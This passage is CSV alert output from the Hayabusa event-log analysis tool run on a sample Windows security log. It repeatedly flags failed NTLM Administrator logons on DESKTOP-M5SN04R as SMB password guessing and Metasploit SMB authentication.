Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
